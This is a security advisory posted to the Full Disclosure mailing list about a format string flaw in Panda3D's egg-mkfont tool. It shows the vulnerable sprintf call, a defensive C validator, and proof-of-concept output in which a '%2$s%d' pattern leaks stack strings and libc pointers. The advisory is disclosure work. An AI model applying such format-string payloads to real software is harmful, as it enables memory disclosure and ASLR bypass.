Message-ID: <CAFmK-GwTxa251gv1tFYB8MKkwZObDiUy+ZEKo8PX6b9u3zGVig@mail.gmail.com>
Date: Thu, 1 Jan 2026 14:35:16 -0500
From: Ron E <ronaldjedgerson@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Panda3d v1.10.16 Uncontrolled Format String in Panda3D egg-mkfont Allows Stack Memory Disclosure
Panda3D’s egg-mkfont utility contains an uncontrolled format string
vulnerability that allows disclosure of stack-resident memory. The -gp
(glyph pattern) command-line option allows users to specify a formatting
pattern intended for generating glyph texture filenames. This pattern is
passed directly as the format string to sprintf() without validation or
sanitization. If the supplied pattern contains additional format specifiers
beyond the expected numeric placeholder (e.g., %d), sprintf() will read
unintended values from the stack. The resulting formatted output is written
into attacker-accessible files, including generated .egg and .png files. As
a result, stack memory contents and pointer-sized values may be disclosed
to an attacker.
Root Cause Analysis:

The vulnerability originates from the following code in eggMakeFont.cxx:

    char buffer[1024];
    sprintf(buffer, _output_glyph_pattern.c_str(), character);

- _output_glyph_pattern is populated directly from user input via the -gp option.
- The user-supplied string is used as the format string to sprintf().
- Only a single argument (character) is provided, regardless of how many format specifiers are present.
- When additional format specifiers (e.g., %p, %x, %n$p) are included, sprintf() reads unintended stack values.
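As an added illustration (this is not Panda3D's code), the following C program shows one way to close this class of bug: the pattern is validated before it reaches a printf-style function, so that exactly one integer conversion (e.g. %d, %03d) and literal %% are accepted and anything else (%s, %p, %n, positional %2$s, extra conversions) is rejected, and the bounded snprintf replaces sprintf. The function names glyph_pattern_is_safe and format_glyph_name and the sample patterns are my own.

```c
/* Added example, not Panda3D code: validate a user-supplied glyph pattern
 * before it is used as a printf-style format, so that only one integer
 * conversion (e.g. "%d", "%03d") and literal "%%" are accepted. */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Returns true if pattern contains exactly one integer conversion
 * (optional flags/width/precision, no '$' positional index, no length
 * modifier) and no other conversions such as %s, %p, %n or %2$s. */
bool glyph_pattern_is_safe(const char *pattern) {
    int conversions = 0;
    for (const char *p = pattern; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;                        /* literal "%%" */
        /* flags, width and precision: only these characters are allowed */
        while (*p && strchr("-+ 0#.123456789", *p)) p++;
        if (!*p || !strchr("diuxXo", *p))
            return false;                               /* anything else */
        conversions++;
    }
    return conversions == 1;
}

/* Builds the glyph filename only from a validated pattern, with a bounded
 * snprintf instead of sprintf. Returns the formatted length, or -1 if the
 * pattern was rejected. */
int format_glyph_name(char *out, size_t out_len, const char *pattern, int character) {
    if (!glyph_pattern_is_safe(pattern))
        return -1;
    return snprintf(out, out_len, pattern, character);
}

int main(void) {
    /* constructed sample patterns: one safe, two that would read stack data */
    const char *patterns[] = { "glyph_%03d.png", "%2$s%d", "%p%d" };
    char name[64];
    for (size_t i = 0; i < sizeof patterns / sizeof patterns[0]; i++) {
        int n = format_glyph_name(name, sizeof name, patterns[i], 'A');
        printf("%-16s -> %s\n", patterns[i], n < 0 ? "rejected" : name);
    }
    return 0;
}
```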
Impact:

An attacker with the ability to invoke egg-mkfont can:

- Read stack-resident memory values
- Leak pointer-sized values, including addresses
- Reduce the effectiveness of ASLR
- Extract sensitive process memory via generated output files
Proof of Concept:
The following example demonstrates disclosure of stack memory via injected
format specifiers:
python3 info-leak.py
======================================================================
DUMPING ALL READABLE STRINGS FROM MEMORY
======================================================================
[*] Reading strings from stack positions 1-50...
[Param 2] <Comment> {
[Param 2] "egg-mkfont -o /tmp/s2.egg -gp '%2$s%d'
/usr/share/fonts/truetype/de
[Param 2] <Texture> "
[Param 2] <Scalar> format { alpha }
[Param 2] <Scalar> minfilter { linear_mipmap_linear }
[Param 2] <Scalar> magfilter { linear_mipmap_linear }
[Param 2] <Scalar> anisotropic-degree { 0 }
[Param 2] <Scalar> quality-level { best }
[Param 2] <Transform> {
[Param 2] <Matrix3> {
[Param 2] 0.0369977678571429 0 0
[Param 2] 0 0.16015625 0
[Param 2] 0.154352678571429 0.84375 1
[Param 2] 0.0604806673728814 0 0
[Param 2] 0 0.1328125 0
[Param 2] 0.826204978813559 0.74609375 1
[Param 2] 0.0565696022727273 0 0
[Param 2] 0 0.054375 0
[Param 2] 0.0898792613636364 0.46109375 1
[Param 2] 0.0153245192307692 0 0
[Param 2] 0 0.0935763888888889 0
[Param 2] 0.201322115384615 0.636805555555556 1
[Param 2] 0 0.12890625 0
[Param 2] 0.679723011363636 0.62109375 1
[Param 2] 0.0350378787878788 0 0
[Param 2] 0 0.0504415760869565 0
[Param 2] 0.255918560606061 0.465013586956522 1
[Param 2] 0.048828125 0 0
[Param 2] 0 0.02734375 0
[Param 2] 0.232421875 0.4453125 1
[Param 2] 0.046875 0 0
[Param 2] 0 0.13671875 0
[Param 2] 0.783203125 0.8671875 1
[Param 2] 0.0252207880434783 0 0
[Param 2] 0 0.152239583333333 0
[Param 2] 0.388756793478261 0.851614583333333 1
[Param 2] 0.0467881944444445 0 0
[Param 2] 0.466840277777778 0.734375 1
[Param 2] 0 0.10546875 0
[Param 2] 0.365277777777778 0.51171875 1
--snip--
[+] Leaked 5970 addresses!
[LEAK] Param 1: 0xffffff860000003f - Stack-resident pointer-sized value
[LEAK] Param 1: 0xffffff860000003e - Stack-resident pointer-sized value
[LEAK] Param 29: 0xfffff68200008217 - Pointer within libc mapping
[LIBC] Param 29: 0xfffff6628a340 - libc+0x8a340
--snip--
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/